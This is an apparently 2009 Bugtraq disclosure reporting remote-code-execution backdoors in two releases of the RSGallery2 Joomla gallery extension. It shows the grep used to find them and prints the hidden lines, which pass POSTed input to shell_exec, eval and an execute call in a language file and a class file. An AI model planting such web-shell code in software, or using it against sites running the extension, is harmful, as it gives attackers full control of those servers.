Backdoor in com_rsgallery2 gallery extension for joomla
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Backdoor in com_rsgallery2 gallery extension for joomla
- From: Jan van Niekerk <jvnkrk@xxxxxxxxx>
- Date: Tue, 26 May 2009 08:03:32 +0200
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:from:to:subject:date :user-agent:mime-version:content-type:content-transfer-encoding :content-disposition:message-id; bh=MB1mx9CQQuOY66iO10m6OSm8RpcN7hzm4chypF1iqaQ=; b=szq0ATS2nMDoJRaMY3wCQJSl/85ukP7SrMSEEA39v17z6ZIKfaVFhn/Vovsh0xPgVg CLrHyhdG+8/vwSrtV4PDNWX9L/3YmMR9PdRBcGFQGaeFarknizRbwnfodiEZYfU6pHJv jlrh7wSu7WVLsjh2iCD8olkaEMRhImp81uCZg=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=from:to:subject:date:user-agent:mime-version:content-type :content-transfer-encoding:content-disposition:message-id; b=n438N3ZnZLskV3v0hK0T6jzyRgpqntHuwd8WfOvx/huQqW6xwcPlAhHI5e7WSt/sfJ TpS+dy8IFUgBRxhgMqKtYpjGSkf8myOHcUKgyWzCW06453ZYgciKc4lXc58hINUn45dl poe0LZrOxKaz7JRP9KaqlmoI3cxGgUrhbq9Fw=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
- User-agent: KMail/1.9.10
Vulnerability:
Remote code execution back door(s)
Software:
RSGallery2 - Gallery Extension for Joomla!
We are currently working on a new website. All files are still
available at
the JoomlaCode project page.
Severity:
Not a big deal. Joomla components contain all sorts of obfuscated junk
all
the time. Who cares what it does?
URLs:
http://rsgallery2.net/
http://joomlacode.org/gf/download/frsrelease/6756/38088/com_rsgallery2_legacy_1.14.3.zip
http://joomlacode.org/gf/download/frsrelease/7791/36662/com_rsgallery2_2.0.0b1.zip
Joomlacode.org says, about these releases:
RSGallery2 1.14.3 Security Release
Jonah Braun
2008-02-13
This is an updated production alpha containing a low threat security
fix. If
you use commenting you should upgrade. An option to show/hide the
Search box
has also been added. See the official site for downloads and support:
http://rsgallery2.net/
RSGallery2 2.0.0b1 released
John Caprez
2008-06-23
This is the first version of RSGallery2 that runs in Joomla 1.5 native
mode.
Special thanks goes to all the translators providing the updated
language
files and the testers of the nightly builds.
Download it and enjoy. Feel free to report any bugs or problems in the
forum
at the RSGallery2 main web site
Vendor notified:
I tried. Not very hard though. joomlacode doesn't seem to have a security
contact and links to joomla.org as if they are the same crowd. I'm sending
a BCC to the given address for Jonah Braun though. I'll send it to bugtraq,
and they will sit on it for a few hours.
http://developer.joomla.org/security.html
Huh? Do I need more coffee, or does this page say to contact them using
the details at this page? So you do that, and it says ... no wait,
infloop. Oh wait, there is a contact form. Filled something in. Blah.
Vulnerability:
% wget \
http://joomlacode.org/gf/download/frsrelease/6756/38088/com_rsgallery2_legacy_1.14.3.zip
% unzip com_rsgallery2_legacy_1.14.3.zip
% egrep -r '(eval|exec).*POST' .
./language/english-utf8.php: $result =
shell_exec($_POST['cmd'] . " 2>&1 ; pwd");
./language/english-utf8.php: $result = shell_exec($_POST['cmd'] . "
2>&1");
./includes/rsgallery.class.php:$out = execute($_POST['cmd']);
./includes/rsgallery.class.php:eval($_POST['php']);
./includes/rsgallery.class.php:$out = execute($_POST['alias']);
There's other fun obfuscated javascript hiding in 'eval's'.
Ditto version 2
nuf sed &:-)